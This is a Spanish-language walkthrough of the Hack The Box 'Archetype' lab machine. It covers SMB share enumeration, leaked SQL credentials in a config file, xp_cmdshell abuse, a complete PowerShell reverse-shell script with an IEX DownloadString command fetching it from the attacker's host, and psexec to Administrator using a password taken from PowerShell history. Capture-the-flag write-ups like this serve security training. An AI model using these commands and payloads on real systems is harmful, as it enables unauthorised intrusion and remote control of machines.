Archetype
Difficulty : Very Easy
Operating System : Windows
Rating : 4.0
Author : egre55
Description
Esta maquina la primera del set "Starting Point" y es considerada como muy facil. Econtraremos un directorio samba legible sin contraseña que nos dara informacion para conectar a un SQL server y obtener una shell reversa para escalar hacia el usuario Administrator.
Enumeration
Para la enumeracion basica vamos a utilizar una tool que he desarrollado especificamente para trabajar con maquinas en la plataforma hackthebox. Esta herramienta crea la carpeta de trabajo, realiza un escaneo basico con nmap y si encuentra un servicio web le lanza una enumeracion basica.
Descarga: HTBenum
Nmap
Nmap scan report for archetype.htb (10.10.10.27)
Host is up (0.060s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-31T00:13:54
|_Not valid after: 2051-07-31T00:13:54
|_ssl-date: 2021-07-31T09:49:37+00:00; +18m52s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h42m51s, deviation: 3h07m50s, median: 18m51s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-31T02:49:37-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-31 11:49:41
|_ start_date: N/A
User Own
Durante la enumeracion hemos visto que tenemos los puertos 139 y 445 abiertos.
Vamos a comprobar si podemos acceder a los recursos compartidos de la maquina.
[root@htb archetype]# smbclient -N -L \\10.10.10.27
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
prod.dtsConfig
[root@htb archetype]# smbclient -N //10.10.10.27/backups
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 20 13:20:57 2020
.. D 0 Mon Jan 20 13:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 13:23:02 2020
10328063 blocks of size 4096. 8257883 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (2,4 KiloBytes/sec) (average 2,4 KiloBytes/sec)
sql
[root@htb archetype]# cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
ARCHETYPE\sql_svcM3g4c0rp123
Para realizar la conexion a MSSQLServer vamos a utilizar una herramienta de la suite Impacket
llamada mssqlclient.py
[root@htb archetype]# mssqlclient.py -windows-auth ARCHETYPE/sql_svc@10.10.10.27
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Una vez conectados lo primero que debemos hacer es comprobar si tenemos el rol sysadmin habilitado a traves de
la funcion IS_SRVROLEMEMBER
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
1
SQL>
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
SQL>
shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.21",7788);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
shell.ps1 y otra para poner un netcat a la escucha esperando la reverse shell
# tty01
[root@htb archetype]# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# tty02
[root@htb archetype]# nc -lnvvp 7788
listening on [any] 7788 ...
shell.ps1 dentro de SQL Server
# SQL SERVER
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.21:8000/shell.ps1") | powershell -noprofile'
# tty02
[root@htb archetype]# nc -lnvvp 7788
listening on [any] 7788 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.27] 49682
whoami
archetype\sql_svc
# net user
User accounts for \\ARCHETYPE
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
sql_svc WDAGUtilityAccount
The command completed successfully.
Ahora que tenemos una revershe shell y podemos movernos por el sistema comodamente podemos capturar la flag y seguir escalando privilegios hasta el usuario Administrator.
$ dir c:\users\sql_svc\Desktop
Directory: C:\users\sql_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/25/2020 6:37 AM 32 user.txt
Root Own
Una de las cosas que debemos mirar en una enumeracion basica tanto en windows como en linux es el historial de comandos ejecutados, aunque la mayoria de las veces viene deshabilitado en el caso que nos ocupa vamos a encontrar informacion interesante.
$ type c:\users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
administratorMEGACORP_4dm1n!!
Como podemos ver se ha mapeado el recurso compartido backups con el usuario administrator y tenemos la contraseña en claro.
Con esta informacion podemos utilizar la utilidad psexec.py de la suite Impacket que a traves de un recurso compartido con permisos de escritura es capaz de generarnos una shell interactiva
[root@htb ~]# psexec.py administrator@10.10.10.27 Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file iRRWXdVS.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service dtyM on 10.10.10.27.....
[*] Starting service dtyM.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>dir c:\users\administrator\Desktop Volume in drive C has no label.
Volume Serial Number is CE13-2325
Directory of c:\users\administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,832,931,328 bytes free
C:\Windows\system32>